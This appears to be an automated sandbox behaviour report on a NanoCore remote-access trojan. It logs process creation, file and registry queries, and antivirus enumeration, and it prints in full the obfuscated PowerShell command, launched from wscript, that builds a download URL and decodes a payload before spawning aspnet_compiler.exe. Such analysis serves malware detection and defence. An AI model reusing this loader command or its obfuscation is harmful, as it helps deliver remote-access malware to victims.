Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace(''			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostp